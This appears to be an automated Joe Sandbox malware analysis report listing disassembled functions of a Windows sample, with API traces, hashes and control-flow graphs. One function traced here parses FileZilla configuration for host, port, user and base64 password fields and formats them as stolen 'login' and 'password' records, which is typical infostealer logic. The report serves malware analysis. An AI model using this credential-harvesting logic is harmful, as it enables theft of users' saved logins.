                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 362916592-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95
                                                                                                                                                                                                                                                                                                                                  Function 004179E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1
                                                                                                                                                                                                                                                                                                                                  Function 00418060 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 08512fc152d1616d0ad9ea22e4a9698bc695f8d0908738fe214e90ce4e812d63
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F06DB1E04218ABCB10CB84EC45FEAFBBDFB48B14F50066AF51592280E7796904CAE5
                                                                                                                                                                                                                                                                                                                                  Function 00407770 Relevance: 96.8, APIs: 54, Strings: 1, Instructions: 584stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F,?,00416414,?), ref: 00407784
                                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00416414,?), ref: 0040778B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0078FC60,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 0040793B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 0040794F
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407963
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407977
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0998,?,00416414,?), ref: 0040798B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09B0,?,00416414,?), ref: 0040799F
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09C8,?,00416414,?), ref: 004079B2
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09E0,?,00416414,?), ref: 004079C6
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0079D920,?,00416414,?), ref: 004079DA
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 004079EE
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A02
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A16
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0998,?,00416414,?), ref: 00407A29
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09B0,?,00416414,?), ref: 00407A3D
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09C8,?,00416414,?), ref: 00407A51
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09E0,?,00416414,?), ref: 00407A64
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0079D988,?,00416414,?), ref: 00407A78
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A8C
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AA0
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AB4
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0998,?,00416414,?), ref: 00407AC8
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09B0,?,00416414,?), ref: 00407ADB
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09C8,?,00416414,?), ref: 00407AEF
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09E0,?,00416414,?), ref: 00407B03
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A1288,?,00416414,?), ref: 00407B16
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B2A
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B3E
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B52
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0998,?,00416414,?), ref: 00407B66
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09B0,?,00416414,?), ref: 00407B7A
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09C8,?,00416414,?), ref: 00407B8D
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09E0,?,00416414,?), ref: 00407BA1
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A12F0,?,00416414,?), ref: 00407BB5
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BC9
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BDD
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BF1
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0998,?,00416414,?), ref: 00407C04
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09B0,?,00416414,?), ref: 00407C18
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09C8,?,00416414,?), ref: 00407C2C
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09E0,?,00416414,?), ref: 00407C3F
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A1358,?,00416414,?), ref: 00407C53
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C67
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C7B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C8F
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0998,?,00416414,?), ref: 00407CA3
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09B0,?,00416414,?), ref: 00407CB6
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09C8,?,00416414,?), ref: 00407CCA
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09E0,?,00416414,?), ref: 00407CDE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407630: lstrcatA.KERNEL32(273C7020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407630: lstrcatA.KERNEL32(273C7020,00000000,00000000), ref: 004076A8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407630: lstrcatA.KERNEL32(273C7020, : ), ref: 004076BA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407630: lstrcatA.KERNEL32(273C7020,00000000,00000000,00000000), ref: 004076EF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407630: lstrcatA.KERNEL32(273C7020,00421934), ref: 00407700
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407630: lstrcatA.KERNEL32(273C7020,00000000,00000000,00000000), ref: 00407733
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407630: lstrcatA.KERNEL32(273C7020,00421938), ref: 0040774D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407630: task.LIBCPMTD ref: 0040775B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0079D4F8,?,00000104), ref: 00407E6B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0D90), ref: 00407E7E
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(273C7020), ref: 00407E8B
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(273C7020), ref: 00407E9B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
                                                                                                                                                                                                                                                                                                                                  • String ID: z
                                                                                                                                                                                                                                                                                                                                  • API String ID: 928082926-2233710583
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eed3481815932f364bf0e04c0bc95b111405f57d22ac2e4d88ccece04f2a4fa8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e0c3d68e69f6296a9396c1eab42491480c8bc0a3d7b858fcfddc2671413b035
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eed3481815932f364bf0e04c0bc95b111405f57d22ac2e4d88ccece04f2a4fa8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E83264B6D04254ABCB14EB60DC95DDE733EAB48315F004A9EF209A2090EE79F789CF55
                                                                                                                                                                                                                                                                                                                                  Function 004103B0 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 825 4103b0-41044c call 41aa50 call 418f70 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41aab0 call 40a110 848 410452-410469 call 418fc0 825->848 849 410886-410899 call 41ab10 call 401550 825->849 848->849 855 41046f-4104cf strtok_s call 41aa50 * 4 GetProcessHeap HeapAlloc 848->855 865 4104d2-4104d6 855->865 866 4107ea-410881 lstrlenA call 41aab0 call 401590 call 4153e0 call 41ab10 memset call 41ad50 * 4 call 41ab10 * 4 865->866 867 4104dc-4104ed StrStrA 865->867 866->849 868 410526-410537 StrStrA 867->868 869 4104ef-410521 lstrlenA call 418a70 call 41abb0 call 41ab10 867->869 872 410570-410581 StrStrA 868->872 873 410539-41056b lstrlenA call 418a70 call 41abb0 call 41ab10 868->873 869->868 877 410583-4105b5 lstrlenA call 418a70 call 41abb0 call 41ab10 872->877 878 4105ba-4105cb StrStrA 872->878 873->872 877->878 884 4105d1-410623 lstrlenA call 418a70 call 41abb0 call 41ab10 call 41ade0 call 40a210 878->884 885 410659-41066b call 41ade0 lstrlenA 878->885 884->885 926 410625-410654 call 41ab30 call 41acc0 call 41abb0 call 41ab10 884->926 899 410671-410683 call 41ade0 lstrlenA 885->899 900 4107cf-4107e5 strtok_s 885->900 899->900 912 410689-41069b call 41ade0 lstrlenA 899->912 900->865 912->900 921 4106a1-4106b3 call 41ade0 lstrlenA 912->921 921->900 930 4106b9-4107ca lstrcatA * 3 call 41ade0 lstrcatA * 2 call 41ade0 lstrcatA * 3 call 41ade0 lstrcatA * 3 call 41ade0 lstrcatA * 3 call 41ab30 * 4 921->930 926->885 930->900
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0041047B
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004104F3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041053D
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410587
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004105D5
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
                                                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004107D9
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041083D
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
